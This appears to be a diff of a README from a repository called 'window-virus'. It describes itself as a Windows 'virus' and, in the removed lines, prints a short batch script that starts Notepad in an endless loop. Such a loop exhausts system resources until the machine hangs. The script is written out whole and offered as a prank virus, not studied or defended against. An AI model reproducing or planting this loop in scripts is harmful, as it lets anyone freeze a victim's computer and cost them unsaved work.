crak3r/window-virus/README.md

 # window-virus
-# It is a virus for windows using notepad to run any app in infinite loop
+ It is a virus for windows using notepad to run any app in infinite loop
-@echo off
- :LoopStart
-    start Notepad.exe
-    goto LoopStart